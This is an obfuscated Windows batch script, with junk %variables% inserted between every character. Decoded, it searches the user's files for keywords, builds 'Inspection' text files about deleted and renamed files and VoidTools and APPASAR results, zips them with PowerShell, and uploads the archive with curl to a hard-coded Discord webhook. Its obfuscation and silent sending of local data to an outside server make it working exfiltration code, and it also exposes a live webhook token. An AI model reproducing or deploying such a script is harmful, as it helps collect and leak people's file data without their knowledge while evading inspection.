(%fO,qn$]%f%@gkFn%o%nTrBwJ%r%zKLe)jb% %]@jARvh%/%I[HHs%F%PFELO% %,iWc(%"%sSzNvdz%u%HPsjEF%s%@Ucyu)%e%pQJcQ%b%@Bu(Fh%a%)oesQML%c%AM$xS[%k%VNeYR%q%TARyV% %nKsCaS%d%dRxw,%e%JGcQd@%l%Dgofyv[%i%BLisiZ#%m%$gd#eK%s%zcMNy%=%ncwAY%"%f]YVt% %mmo,TY%%%F%tJWJPA% %Jq.Y?aJ%i%EgqXiD%n%h?mndEL% %GHKpG]%(%oFthtu%"%mBK@o%a%vCUrS%p%CEkdmUP%p%nEoKbL%a%@G,dxtq%s%fWgvyJj%a%WVXJ@F%r%j[fA_hM%.%yFKUNQb%t%wPKqPqV%x%bQs.$%t%_IMqNL%"%Akzd(dE%)%IkbOql_% %bGRG),%d%lknV@cH%o%QYlI(q% %mYvlyKT%(%QXdZ.P%
 %sDvi?r% %#vOftD,% %AnM.p#% %nLbTk%f%EXMHx%o%w@(VGcV%r%WIVZT% %UyUF,%%%K%RMN_ZD% %OncSbZ%i%zRmBJh%n%bJnuPcW% %JULVOX%(%Rzvu(d%%keywords%)%cEf_m% %IMJq.L%d%Cln?q%o%)YGRU% %uvMpP%(%kJCI[%
 %DE)ra% %qoAz.JB% %eo)Jeh% %Rxci,% %xlC.lr% %FaFoJ% %PQxW]nG% %Ufm_F@%f%EnIk_,%i%fyG[ZLW%n%nUjiFz%d%ThNvX%s%,AEvPsn%t%ERSg#WU%r%eQfvb.% %ikKFhn%/%kbjY_w%i%.lNxK% %gK_MMpv%/%tAf.[%c%YzWFs%:%shbZLb%"%GZ))Q%%%K%DfOEV%"%AaCLH% %)a@nY,%"%,Z[VSZt%%%F%zwDaE%"%TFE[dj% %ihE[_%> %rJfwIb%n%zz]#d%u%],DRKm%l%dMD]A$E% %tUlNU%&%j_APg$u%&%zA]_yJN% %kfRRVo%(%(arvP%
 %yD.[Tg% %Cl)u[@B% %.Ygfu% %zai#z% %UR[QDgu% %vaDjYcG% %Wtvft% %q_AgFQ% %.WnvNz% %RfdYL% %ndSuG[Z% %.zE,L%e%oSpf_i_%c%MT,yRH)%h%aoIs.,%o%IJZBvk% %uw,rUT%F%TzUeMx%o%AARbaC%u%MAHHu%n%YzISrd%d%yM.(d% %PKvUCW%"%H(@R$pn%%%K%]YAq$%"%[SHTp% %W(rBUL]%i%XZjTV%n%BWrV_d% %BB@R[%"%ZlxP(H(%%%F%(Rlznk%"%CBlQsqV%
 %M(FkhP[% %xziNl% %q?mcW% %GSxC$% %vvokVM% %lSX@qgA% %cCI)znu% %[?t@#gj% %jcOWV% %I$vRE% %m@,w,la% %b]aLYbv%e%qTwpThl%c%fgppx%h%homki%o%TPZxf%.%(j](Y%
 %hamEX?% %faWmP% %MkIfp#v% %@YZAH% %EVEW.% %N.,kJIt% %uSCOeJD% %G]hKu%)%kX.g@c%
 %qEHmrtw% %XNCZ[UX% %vqDOxEt% %zqfJV%)%VvbQotv%
)%jotswI%)%@#MNd% %EWizU%> %fa.V[vt%"%?Pu[Kh]%%outputfile%"%CyW(]Y%

R%@__iUrd%E%m[QOm%M%P)E[Q#d% %k_XIi%F%okAIM%U%mbm#msF%N%MGPwgqb%C%AwXmaE%T%Gp_dJw%I%OXPbQOT%O%Ym[z(#_%N%nuoQS%S%r#mcC% %HYuWlX%E%wt[haS_%N%Sb)uw%D%U]B?]d%
 %#fVun% %@gDU_Gu% %sLWUC% %,jFaZ% %LHV.kbm% %tRmqe% %)vEo,I% %?go(X% %ZVUF#?% %rFAfR%c%mhroW%l%zclK@,%s%RwI#(If%
R%su$WTY#%E%NWpVc,o%M%YwpO.% %GDdL))r%C%birSapV%L%NVZ,H@%E%RCeYnL%A%T]aA,I%R%,LlDXT% %],R(c@V%C%bT.yF%H%p[@wM%A%cppvM%T%E@K(F% %eSkLc%^
e%tOnCHf%c%fkiXDV%h%iKr[V%o%?xl$,yB% %MxYnJ%P%KIGlk%l%xGR@d%e%VlsvBSx%a%Kp(M)%s%Kg,AYD%e%_oFnNw% %nof#oVm%W%EWeO)y%a%_kZSlAc%i%k#qQYk%t%EmjKo%:%v@m.qN% %oQ.[pgA%%Discord%
e%pKcB@%c%,P?UU%h%?uycY%o%SYrTVZ% %)H@uOhF%F%SCJuLD%i%ijZsTPn%n%Ec(TX%i%vZ.kSU%s%kqca$z%h%@g]nXG%i%Imorp%n%BFRUo]%g%AD#getf%.%PygVZR%.%k[AhO?T%.%IJMgHM%

R%bbUhPas%E%kAkN(%M%Z@Oohb% %nz?CVAV%S%BsGkA@O%E%JJ[Dn%R%zqIkQp%V%$dWv]gN%E%xepK[wW%R%LG[hb)% %@caq)e]%S%sMuE)m%E%,])N(n%N%?x@[wPO%D%VoNVWn%E%.kmiKM%R%k.rh[?i% %jB_BwNR%f%Srzq#Y%u%(uWz,%n%RKuEk%c%.Cmr)%t%@VmgN%i%KUKrhc%o%ooXA_%n%bzdQF%s%hAnzr%
s%.voKu#%e%Z)[YZln%t%eOY.J% %ApXTbEc%"%VeWMYTU%w%L_Hq#xC%e%bH.oW%b%EZwSM%h%KL_zAL%o%h,YVh%o%G?rg]Mb%k%XEgHgSm%s%tnLQnHT%[%B(@GfSL%1%GotZlI?%]%Q(oFkV%=%uxajKQd%h%qiUI$%t%ZymhE%t%[ubt.%p%EAbCG%s%uHmYF$t%:%Am)EP%/%iClMk%/%YZqFu%d%R]$g#%i%L,Dwa$d%s%dd)u_ct%c%,(QXJB%o%)oMd(hs%r%f)IZQ%d%txRd]c%.%KdktlRb%c%o@#Vaam%o%,NhiM,%m%fqSO@?%/%rhnCR%a%X]v@h%p%@xHAoCq%i%WsYIcR%/%#EgzF%w%KOIgAYd%e%J]wzOTI%b%KbqZxA%h%EQe)#%o%N,O)P$%o%@NCQLYJ%k%)iOQCLW%s%hlPHE%/%GwkjZah%1%OHSVlxu%1%iDbO?%2%i.j_ex)%0%O_egx%8%GRv()%7%Y,Kbyt%6%SaghLe%6%ZciWihN%7%]XZ]qU%0%zMIDYNZ%4%wpJyL%8%FFm?DsB%4%RcipEOL%7%fFKFe#.%5%e.]oLay%4%R_itbxP%4%wT_XAmn%4%k_UKi%3%zMe$F%/%dGtV(aC%f%D)jkjN%4%FOlvGFp%f%RgoXT?%J%rnUeNN%z%BeEK_%N%KJ?Ao%M%@?Dei%H%B]KdN)%6%VcLtBV%e%iDoV)i(%6%UVEZ_S%n%lOsBX%Y%KDfJi%8%KbaNN%Y%gbCKCwN%F%[nNMry%d%gAuSFCE%C%QD@[wsc%u%m(vgq.?%t%UXvj#[%2%TIPVm_%W%aCgJg%E%_SIbOA%c%GkFOf%k%P?#$J%T%sGU_Sj%l%tRy(?%r%vRZgiHF%7%KeymBW%c%dntjz%u%SGzW?)%C%OYEqmt%z%@CIL)k%7%woLBG%j%kKCpg%7%@]BoT%A%)Kkkhc%w%zHkSEP%2%o#,FDm%K%[jgyV[%d%algtA%g%Po[ivq%B%APQ)mX%V%TjM$.Q%S%dtDDgn%F%UyRfy%b%]xmUHp%N%VPJ,ZJP%7%@c,_f%s%jtHXeH%z%gOlVg%T%bSXrs%y%N?kNG%g%nbjME.%b%ffmT(lF%R%?O$rx,%1%w,tSzi%b%($HqQ%o%U[yoYd$%A%ciASq%2%qkvuL%l%yBEet%U%qdGJzY%N%MTNwH%M%#rOckf%p%BMDtLHE%2%eRBBCc%L%?.owcO%"%H?(SE@%
s%pQnLDMQ%e%vfaako%t%aPJVyzU% %rPSqF%"%OrA@M%w%re.rB%e%BQIW$iL%b%yEdLW%h%UfuYC%o%jfeIE%o%jTSmysg%k%YZSnbN%s%YSVR.(%[%ueUpLh$%2%X)EYpG%]%.bzwipT%=%U)ol.a% %GUJJQ%-%)_vJ.%-%bxN_z%-%pQs#Ra%-%k?tO@% %M(Jvg%O%zDgUyx%P%EJuffq%T%AU$qdU%I%lUtaMR%O%@U(cjB%N%q[[v$SG%A%XsxQWZb%L%MTMycXw% %wdvkeXI%W%oya#Fs%E%PWO?(E%B%jpSX?W_%H%Nh$ejw%O%DlqG.#%O%iJIWo%K%RMZRX%-%iuAEl%-%enYlGg%-%pt[([(h%-%ShLAV%-%LQ[GM%-%WNS_P%-%e@NPM% %V$CY,%"%OoIe$#b%

R%FyWQTpV%E%g)$ySVo%M%_ljeB_h% %vjn@H%S%ysy,URF%p%@wdN,wz%e%A#$Q$%c%k@(?FO%i%#_JLUpW%f%)ryO@$h%y%noDbFu% %mkxrVH%t%szRDKy%h%x?]PRf_%e%Ku.jmSz% %jYlIy.%p%z]taVK[%a%FpOTox@%t%uzV#HpU%h%ZpCw)% %dnowt@%a%zwuOPn%n%[f?A.z%d%,z?[yur% %$$Boo%n%swDzzJ%a%DBjjdlN%m%XxurP%e%FrSG)H$% %,HJQWyF%o%DJXThz%f%z.eE#% %U#FZuf%t%Ahi@BEM%h%LXPpt%e%rI]_F_% %o$KegPZ%z%KBWcbh]%i%cDFKif%p%bfsAIm% %PhfsjoO%f%ezkzO%i%choGv%l%LN,i$%e%fmAFGRv%
s%_.?)Xq%e%GVL(tp%t%?sFtmFK% %ScMYw?,%"%hCVZA@%z%MClHm%i%E(QN(Rt%p%se#QG%F%$n$HV%i%yegwEId%l%URemXU%e%ShqXq%=%vYX,r%%Discord%.%QM?GXjl%z%dM.#Hq%i%r_)zAy%p%#Fb?Mzs%"%,[aQ)E%

R%(eyv]%E%noeH$%M%tA$r.a% %mUQbUP%D%xa,.V%e%z@U[?%l%VEJP.U%e%No]Qa%t%ahm##%e%Tejt,% %Awpsfhh%t%VOX@qd%h%ourfev)%e%uV_CEj% %qXN)NE%z%i,(]VJ%i%lZw_gd%p%JJLCg% %#KU.Vf%f%JXkc_u%i%Sc_WW[V%l%jzKBVT%e%OBydWLf% %[G[YBg%i%?YwO#%f%NnyMFUd% %aSGpI%i%]#,QoeL%t%nnQxU% %PELJ],%a%L_PLEQz%l%[e#[nz%r%xyg#[gr%e%ugikioz%a%UfmiX%d%?Mv]h%y%h?(l_Xw% %xKmiLi#%e%Q,[AEjz%x%Wf@hfkx%i%k(nm$%s%vJPQpi%t%ZQdkQ%s%ZEezv,%
i%bDOAk%f%Gc)eeSy% %ho$Zp%e%RvKL)p%x%eGWsY_?%i%#IAkz_%s%vBMektI%t%wW_jlf% %MfvAA%"%yUQFZ@O%%zipFile%"%,X_ETZ% %c_aq$%d%c@##p%e%DX@QKaS%l%(ggAYAJ% %DBnqR%"%fkltWAO%%zipFile%"%vWu(c%

R%BHoYJ%E%Y$@SCjR%M%REPg@S% %nSvKE%C%EPWEx%r%NY@ZS]%e%hIYLGU%a%IjrQkkR%t%##lMCPi%e%ioc($fF% %MIN@qF?%a%Mf#)NTn% %qt.##r.%z%dncbb%i%Sjzdmb(%p%XJckw% %vsk(?x%f%LKqmX%i%RUMp$%l%_x$Wt$%e%EBoXcSf% %PBG[TL%w%jWkjn%i%]vjYja%t%MW[F,#l%h%fefZ$J.% %kLT#DF%t%HwvlI%h%HTjjys%e%e.$JE% %nhXDMSL%t%DS@rsEl%h%Et)$xT%r%.EBC(l%e%iI.RJHV%e%RJXAc,% %BDETO,%f%GcMcu.d%i%MLo,KQ%l%NigbT%e%RV#kjzd%s%En_Lj%
p%ewUnR%o%.)$dSoX%w%DPxSBl%e%(eBdmtc%r%nHL)xOL%s%,fIlVE%h%JnjQyT%e%rPjad%l%QXjwklj%l%,a.zP% %,yGyff_%-%Yj)ovjz%n%M#qIl_%o%AmY)iRK%l%wlps$,e%o%Cvz.if%g%WHsII%o%x@agl% %Es]Nz%-%@JTD]%n%q_RS#%o%,uQefuy%p%vJOnP%r%_Qt#tr%o%,XEeF(%f%Y?VB$,,%i%z]oUXV%l%ZxbfL,c%e%bAMxvC[% %WKan_L(%-%O#@?Z%c%ewwsAZJ%o%SG$QKq%m%$lRLAmK%m%Hst,E%a%XYH?V%n%MuaO.%d%ZaiBsbx% %#)auhCO%"%Dfz@ZaV%C%jSYd]P%o%?.arR%m%).nwI%p%RPAWl)k%r%yskjKp%e%rZ)nN%s%xoeph)@%s%SDvKuu%-%@$gSSpC%A%j[Beuu%r%nyIYuVT%c%fEzbz$%h%HA@y[AY%i%#i,QJH%v%ze[Vd)T%e%a]Wd.#(% %Zu@aaJI%-%MNLJDs%P%RemWd%a%mTigc%t%FiXn]%h%MyUWxiG% %V.@,#Q%'%zVgA[@t%I%eXRJr%n%N$_u)W[%s%Hpslj%p%QqA,ajt%e%()JL$bN%c%beZwD%t%$Y[kGM%i%qvhVdzt%o%vdvNhW%n%$bAr#E% %Z@wPddI%D%?hpjr%e%.lnf?%l%l.[PJ%e%Hc@)gz%t%bRpyCe%e%oqWrmlW%d%rlwtBl% %Lyh[Ao%a%L_BZl.m%n%ot[d_%d%hmjHjP% %yyicG?%R%_sAIJD%e%DH)lt?w%n%TXQu_%a%t._BW%m%quUJyAj%e%RgugvZw%d%WFNyHx%.%m)??Xl%t%ks,gR%x%ARs?Py%t%PEtqHy%'%PE_Z[%,%aXH(FM,% %xCzpq%'%vtYnS%I%GqRs$AZ%n%JReZe%s%wgEWWO%p%QYPEivh%e%I[PQun%c%Inl@Ry%t%jABjXk%i%dIjiuSf%o%sy#YkP%n%.n]s_% %iw,Mf%V%pHRFJTo%o%PzKg#%i%WgPwDo%d%Rb]EK%T%tkSlE%o%?mnHFdj%o%j$hjV[%l%wtBpa.z%s%rW,TU#%.%UU,xw]%t%OWM_jP%x%d?L$o%t%Vwt[_%'%EZIUJ%,%H)[WB% %#otWK%'%@D(Zj%I%?yx@](%n%QkTyYZ%s%(CoBGGW%p%fEqm.$%e%pACzs,%c%GOqDxlG%t%y(FfV%i%CQLbmI%o%OrMBc,%n%A]vAQO% %HvTMb%A%ovODYsu%P%hFvnx%P%[nYwa% %.(f.uO%A%X$ae(,%S%Cytxjv%A%@tsal%R%oXHkzk(%.%[FlOuq@%t%.M)ap%x%lJe@[%t%E)QXs%'%R,YhH_% %waH.FI,%-%Y?sbe)w%D%rJRCq[.%e%xIhNPX%s%uH_Qk%t%iHzHK#z%i%QrbOGx,%n%.lyBW%a%?NcBSb%t%PTSvjfL%i%ivS,T%o%FDlMIJl%n%WDKv@%P%db]frD#%a%[Gaqoq%t%XXDSaE%h%]kMQ)% %o$U](%'%ij@rG%%zipFile%'%eE()xl]%"%r.xicA%

f%Uuv$x%o%MFhS@ZW%r%g,zXx% %zay?x%/%ZsDiEMy%l%mDJAdcr% %RmVjqZl%%%i%QfpN]U% %aH_ZfI%i%GYwGL_,%n%qFEbLf% %Rd@rT%(%?rvrgWn%1%GzPJN@J%,%nymdpQt%2%MP@LW#%,%$.#?Ql%2%@pPgGr%)%@E[EH% %EcSYrj%d%EcZWUw%o%u,@gw% %Cghr.%(%d@$?[uF%
 %MzIIi% %eJQzjXs% %xbOXCl% %DiqBPiQ%s%bpos)vH%e%f_B@a,%t%ckPVNT% %fGEAH,Y%"%SjYOH%w%pnNn,%e%qOJDBG%b%PQE(nJ%h%qe,JX[%o%JINKIkM%o%MDaZha%k%rkprDdh%=%HFNrT?%!%Eb?dBbh%w%#MeIIb%e%ywejh%b%q?Dim%h%CwfOdX%o%j,GD)%o%At]Xq%k%gTYlTG%s%XvemdW%[%GtD#)_M%%%i%YsuM)XD%]%oTnwMwh%!%j#vhl%"%YZ@H?c%
 %CrBqBj% %EIcg?,% %wXJL$t% %#mJp(qM%c%HQuym%u%EBvpGyO%r%kCyqd%l%dXnkjo% %ZeOxtv%-%$u[yn%s%q#uroy%S%RRymWQR% %x[GH#e%-%eM]lKF%X%[ZA,w% %(FqAlb%P%gahZHqX%O%A#x$pW%S%H.RFSQ%T%gS_nVL% %fM#Ewss%-%]j,jkn%H%vy_Sh% %vzCe$P%"%K(iwZx%C%a(_yUD%o%(zHNKvz%n%AUeDv,%t%RDZiw%e%YdxHo%n%zJYLBDt%t%a$TfR%-%bFGpUI[%t%FcoXLN%y%Rfmdm%p%Dr@z.WQ%e%ZOLoinp%:%KloFF.e% %GZdjB%a%OMEIdFE%p%fHX_z%p%Omq[]%l%pejG(%i%QiS$D?y%c%THnSYx%a%#zC[tZ%t%smxVRnU%i%qYrxl)%o%ECo#HJ%n%PuHva%/%)hXQmf%j%P?.ZmV%s%uXKpq%o%W]$AoLH%n%ZdAp[?%"%zaxeY% %H@Rdjb%-%]sV_U%-%t[.w]D%d%Xb@?l%a%XwUJA%t%unE[ep)%a%Kw)ij% %hohth%"%BFo)##i%{%gR,AQ#V%\%FpFaE,J%"%$,WFc%c%P[ynwnn%o%ZUoMuO%n%uNt@@r%t%A$@fKy%e%dLPRGNP%n%Ylle[w%t%WbNTC.I%\%Zx@mb%"%tMIv.D%:%oyi?i% %zuucDow%\%KQu]n%"%pBAepo%#%sH)Ylr% %F[Jent@%-%F)XIy%-%[YVNyU%-%]Up,sYc%-%?lNe[a%-%dxIDka%-%BI]D?m%-%ftcwsi$%-%,oHWk%N%rUGPIW%e%..vMck%w%qmNqhs% %Z)aTg%F%bj$Uvj%i%xq_Co%l%#jVaQT%e%XdLDO%s%UYI@)]% %ahBl,.%A%$@.Ar[[%r%muqaOB%r%dJgvcy%i%]omAcN%v%eSg?(%e%p#CZjs%d%(lU,QXD%-%Xt,[(_H%-%WVRPydj%-%ZweT_(.%-%s@,I?i[%-%ip$NGs%-%fPIwvOa%-%hl[ef%-%,SApj%\%PNX@QOA%"%aX[RQ%}%eiNisL%"%EbgHGE% %.TEEfj%!%snO,S%w%gLJ(uzg%e%_(p#,%b%ro(D)vA%h%@F_chO%o%bpvLu%o%X,eDG%k%#ej$D%!%NMFJnWt% %pY[eA)Y% %]I]HE% %NQnkRJ% %x,FPlhR% %fz(Zi% %NXNk?X% %LQRwE% %@#Xthl% %LchdcH% %(D]sS% %cQmgojn% %zL?bfgt% %JOoJTZ% %]BAY(Eu% %g$v@xMJ% %)THJVtH% %vfJcA% %gCLVMhu% %UJ#VUB% %DeVnT)% %lF#Uq@% %kNNN)% %l#QqGo,% %(V_xq% %dMNCvKj% %_TLywv?%>n%YTUjIiW%u%duqsxn%l%JX_ez% %hfdA]z%2%?PDfW(A%>&%yqH(b%1%,tx.x%
 %B.a(nbm% %@wgCru% %zdHfavp% %lzGnA%c%rjBCOaW%u%PeN#do%r%O,p]im%l%C@_WFt% %(]o_l%-%SUKZ,%s%C$sHl%S%RWW]D% %w#ejL%-%r$CzSZU%X%[oI#ogg% %GiFxY%P%Z#NHY%O%zdVh,%S%zZ,_uCX%T%IsZ[PK% %SgKMHt%-%ZHzGsAu%H%xAS$WY% %Mt[sQ,%"%]?t)tI%C%lICpl)%o%SM?GyMP%n%_zLYv.%t%]$XeK%e%MvsbN[a%n%rL,ahV%t%RjXaJ%-%c[qzNn%t%cdMe[Zr%y%pbON$%p%aHcluST%e%ts[FgCz%:%(Oi,tSo% %,HHP[(%a%aMAtX%p%qa?OLsK%p%qZYY]%l%v(Tqo%i%BiIvEsb%c%O[_Yc%a%bnLslAu%t%,$AJf%i%RV)@Uy%o%o#g,_%n%IligRe%/%NkaWq%j%H#AMKTr%s%BU[USw%o%T#zd#f%n%[Al]h%"%kVFZE)% %r?)cH%-%jF]nDb[%-%w?)iW[%d%Sxmek_r%a%dKbaQd%t%L.hYL,h%a%MDo#bG% %izkPZ_%"%bn,thH%{%m[fmI%\%c,ZSMor%"%EyY,@%c%_QoPi?%o%iDukdv%n%eBspdL%t%kt@DyL%e%(KG?d%n%WBkSg%t%yQKKP?h%\%DhIn$%"%.sexQNu%:%aYSbZ% %bKE(Zt%\%PwR[uJ%"%cqj(J% %kiul@%*%ZxAa([z%*%GXC$aEC%*%ZC)CP%U%?GnFhN%s%StabK(B%e%PJ.Yq%r%qUzS)%:%tLUaU% %XUCsV@O% %pIJ]sVt%%Discord%*%ZnfYj%*%eSPIUD%*%]cuNH_p% %lBRNwXI%\%OHgTFP%"%xiBrPAm%}%RH(RD%"%pjnGB% %g)jCp%!%Q#dDv@l%w%DZwzzgD%e%kSC@z%b%rxBn@%h%rd[Wr[B%o%xuBz$%o%]lYBX%k%xizp$%!%oYibt% %DVt.]?P% %Ny,_j#% %xhkPQ% %jJ)eW% %CniuVWp% %Hf)qa% %)NE?d% %ApEQJ% %Xh]pj% %Ugene% %lCxnW% %ALB,qs% %,.,pmp% %_uCNm$e% %Igd]y% %kZOX,Z% %a#m,Eup% %tDb.lV% %jLOzZf]% %deyzlGw% %ldm@O% %VjJD(@% %vs#J[% %$w@uQn% %)wUZsAn% %cfuMI% %FQaqnx% %hQI$YDo% %gVkAHbO% %yDy_q_% %OVTEx% %$h$Gb[$% %AsnwPcr% %KP[s?f% %FJMLqIQ% %ewgpN% %SaTv,Sq%>n%Mwd$I%u%$xhE,[r%l%,wXOye% %ga$K(%2%,ie)L%>&%cLLfa%1%]YOkCwN%
 %SDI@N]% %ai[(qQ% %Pl.iVgA% %W,NfYo%c%Ht?DqUA%u%FXIEYXQ%r%kc$c@%l%@([CE% %fSIyraf%-%ikLihi%s%JW#qL[%S%VS[rndT% %JfAXE%-%w[[wj%X%ldjde% %Pc$]O%P%IXeQaL%O%hy)BE%S%JYypZ%T%,T))J% %bSj.yuR%-%PQaIGi)%H%uAUMr% %yzCoQW%"%kmMKrD@%C%x)nJ[N.%o%pTXEHX%n%b[QhOXo%t%_pjPo%e%w[whD%n%K$v?AOG%t%mXkYv%-%Kz],GB%t%]sAmS%y%FlLhFy%p%euiNy%e%tM?(#%:%#L@wy% %VWljNYX%a%mtq.J%p%IuDx#%p%or@Q[Bc%l%qkNL[JG%i%ZA,teKb%c%x(ntpxq%a%P_@w(C%t%HmDMM$Q%i%n]mG.%o%EiZyX%n%QzgABb%/%xoEifU,%j%JSb_fsW%s%NCqq,V%o%e(mHBf%n%jEYPaS%"%VWdcxk% %tE_vaKU%-%kjX]Qwr%-%KIy[P%d%DqDBNC%a%Dh)cc%t%jYola%a%ZMzII% %Sv#a#%"%PIdimOm%{%QxmVZX#%\%_[ncQ%"%t.GhO(%c%hf#Wb%o%QntLVWL%n%Lui[R%t%cTUeg%e%@HtkU%n%cXOp@L%t%MZPZQu%\%kxX@RZA%"%AnWBFZ%:%TxBrE% %ePGpFA%\%_x[L,Uj%"%G,oSz% %egtJn%*%t[Spx%*%qGAkEY?%*%Am?pJM%D%?Os@.[?%a%Zr(eazF%t%EiQIm)%e%MJHzJ%:%.v#CJvq% %.nksG.x%%date% %xmBTRG%T%iRfFzPc%i%tMj?jU%m%CzfPA%e%a(et]q%:%jKj#Q% %@uxJCnb%%time%*%VBV?O%*%XClhD%*%lVfXg%\%zTs@[Gp%"%U]Dpf% %cbhLlw%}%UB(g.Lv%"%C_@w(]% %GpDZAb%!%rtJSwu%w%(p#Z[$Q%e%fjyGZkE%b%ZHok,%h%YYkFh%o%)Gpco%o%_zDY(OV%k%XbfZa%!%G(_@Z% %ZkMrJ% %YQ)KR% %cEIYg% %Kv(MS% %qLrWOCS% %bNPEsKk% %],dB,L% %GKmIV% %xZJCRUi% %thsBq% %)QzDY% %Ealrf]V% %sflUH% %fyRFV% %J@gNqZQ% %sD?xa@% %JYWiLg% %cQOTmg% %KNeAWP% %Ng@fx% %FUnSP% %k_KnAsh% %j(AKx?% %UikRg(% %Jte(?% %qXgDzI?% %U?mzdTj% %Fu[iW%>n%J.$cvCJ%u%Vec#aw%l%FUpVi% %[Ob.i%2%[ypx#K%>&%tYtAy,B%1%)eBYy#y%

 %@cQKuIq% %dQPSsUt% %zdiMBc% %SfAFQhp%R%I#ptplZ%E%EWscq%M%lrUZSy% %dqqqS%S%u]yYn[_%e%HlgKwN%n%](QO)MG%d%]szKPGo% %OtjCO%t%WDnFAH%h%g#knlL%e%Vh$d[)% %Dk)C[%z%b?Buo,I%i%[($[BO%p%KDy_LXX% %[[VIceI%f%bz])(iA%i%uUqMa%l%s?yjZc%e%d)_zLz@% %tIm_WBz%a%T@F_K%s%Xwi_g% %OiMFcU%a%YTfdT% %NZotsJ%s%CgDaat%i%?Uwb#x%n%cMTzUrD%g%@)c(e_%l%CATslm%e%b)uMdd% %Otq(P%a%CACse%t%bqpYE%t%Z)um,Hx%a%cSsL?aO%c%v.q[gQM%h%?K_Tc%m%j#Hjt%e%,bdHC%n%DU.iKI%t%VYETq%
 %DJM$.kf% %oQLiQF]% %Kbd,v?% %#(hDLC%c%onuscC(%u%$FKoG%r%x,(Bb%l%wXY)?% %tsJ#Cb%-%MkUFx.G%s%saLEGDb%S%SMC[X% %bTmaGIB%-%@.ntj%X%LoMZMH% %ZMDrx@%P%wGne)p%O%Ek,,rzo%S%ngGc,%T%IzwIxQ% %WrLM,xr%-%(Zbpz%H%zslfcsQ% %#c_U,%"%oe$eJ[[%C%Ja)@Un%o%BmgyP%n%zIWqTB,%t%A[z)sp%e%MZl)LFK%n%M(E?WJ%t%NQICLJ%-%,?tVa%t%oQibzm%y%lUY)D$$%p%u@crshU%e%emyKl%:%)zLOtWn% %S,TF)a%m%zHoo_%u%fnxoAM%l%P_$VG%t%ImtliZ?%i%bGyG)o[%p%IK?WdT]%a%es$u,%r%sHf(EbJ%t%dTTs]nI%/%[HTSHK%f%lzk#X%o%XoXcYoV%r%PfmPWt%m%XSaoSF%-%rRXFLa%d%LLzkeM%a%dU#Xq%t%HEN@zfq%a%tqpeBB%"%FxKmre% %f]wFIQ%-%T[]J@NJ%F%CIAEJ% %,VxpHM%"%(yrdli%f%MONQX%i%MEu]CGx%l%FzTjhG%e%FbtCJSj%=%dAala,%@%xg@St(T%\%)xWr@Zp%"%Twv@oj%%zipFile%\%cFwFeKb%"%?QpyhY%"%@ccrYvL% %dBJd[)C%-%xAg@n%F%xKYIYT% %CHRcSI%"%[uS$pb%c%cNw$[P%o%n_M@MS%n%sAEa$uK%t%DFe$r(%e%BAzXQq%n%Gp(zeGk%t%THBBJ%=%hJPng%"%xCznxLa% %(UGxm%!%Go$z#%w%Yul@QAd%e%fNixscm%b%LILdYu%h%Pxnvu%o%[kAWgo%o%u@Q?a%k%sllEBj%!%Fmx.F% %BqiyA.E%>n%Dm$tk%u%raKoA%l%AkyzjYw% %GRPkwp%2%@KDGJ%>&%VZJv_%1%p_)#@R.%
)%EmLi(B%

R%RnY#M%E%nBCNu$I%M%)S_$I% %s@LrZP%D%nHMnyj%e%hu[Zy%l%_QHFa%e%TXaFcpV%t%mM,cQAa%e%tM)QW% %U]T_kl_%t%)lBJFG_%h%yIN@Lx%e%wF#fJ% %#NHO#%z%F_Hy#a%i%(zLiMq@%p%euojA% %.B$IDR%f%pr.B.%i%NgbzuvZ%l%VvtB[GE%e%.]FyWj_% %)IcHPZ%a%(]pMsJd%f%uXfJ_X,%t%LpWA_%e%JAfv.%r%)lFts% %Iv$as%s%Cdq#eF%e%z[Kq?d%n%UvqKt%d%zrcOo#]%i%qGA?_O%n%jCkftLw%g%@RpeV(%
i%vdIWr%f%dRFMoMc% %THp#U%e%JlSdyW%x%hVNvXOP%i%bi?Ky%s%k.E?B%t%yn#LToC% %pRtRLgl%"%xScLcq$%%zipFile%"%wuAEw% %$bIi,rB%d%ZPCE,%e%W)$[r%l%]$jbp% %FbVFgSW%"%dBllvc%%zipFile%"%phuBCQ%

R%GUpAm%E%]EAjU%M%u,(sa% %pYfNN%S%DbiGUJE%E%bVkQCg%R%.VOQPz%V%zfTp)%E%)jUco)j%R%]YIdX]W% %I?wMsAA%S%K?so?Db%E%AYxlS%N%OWxtV%D%]RSslE%E%$cI#$)%R%Xm?@?% %,EJNJa[%f%jMy)]E%u%gnlJc%n%XurpffI%c%pk@TkT%t%i$LgmW%i%C_HG$[%o%gCEPLy%n%DHLWIC%s%?Swlj?e% %Nynef%E%MXzoZ]%N%IvmAwL%D%tdfD[%


R%gSZy_Y%E%wRbkRrE%M%HpP?.% %gSVg?c%f%YiToEP%u%u(DTr%n%c#kV]%c%tRFqmqe%t%Dk(])Oa%i%SU(]h,T%o%WF$Y]Nk%n%]M_RfDR%s%(CMrHVK% %qlHDb%E%J(yRf@%N%$NUGZm%D%(z$$$U%
e%?Bs)L%c%vjchX%h%xzn_lS%o%AA$GPg% %oTLwTwb%E%atsMb%n%Gi_qR%d%i]VPxiQ%i%(tgzBw]%n%D_kOG%g%coNxB%.%#Lz.vLI%.%GiN?z%.%W[$iBs%.%IwpPSY%
d%dlDsi%e%Hu@Oyn%l%pjftN% %ORhqE%"%q?HgMe#%I%)#BqUA?%n%xu]_bA%s%QmwfdIy%p%GrvMlI%e%b(.Ava%c%wDWUwWR%t%ShXz$en%i%B_V@HT%o%EKEJA%n%b.ajK% %[bsY_H%V%TPlCZ%o%xo?lZRe%i%xpKSADe%d%YOwSh%T%JAgzZ[%o%h@NywK%o%ihMOdR%l%PFbvG%s%XL@No%.%PuNTzH,%t%kaiGZVC%x%$?mnh%t%XggYhK%"%wvpyPnJ% %KJzAH% %b_xeSt%
d%vPE,S%e%wPL@E%l%rTB(lFj% %W]VRzJ,%"%RXefJ@%I%i@O]@%n%t(Efuv%s%bAJQK%p%Oxyl)V%e%N#.wto%c%qw)hLH%t%K#lD]hc%i%TjE_D%o%TscNmK,%n%lhjFXE% %uXkVqy%A%WsIFZeB%P%Lv.XwM%P%eofSr% %(Li_EG%A%nrUb[vU%S%QBtStcO%A%$S]FY%R%RqpUv?%.%Z,O#h)%t%g_drZVW%x%cG.c?BZ%t%CG.rJI%"%pvbPu% %QTa_k%
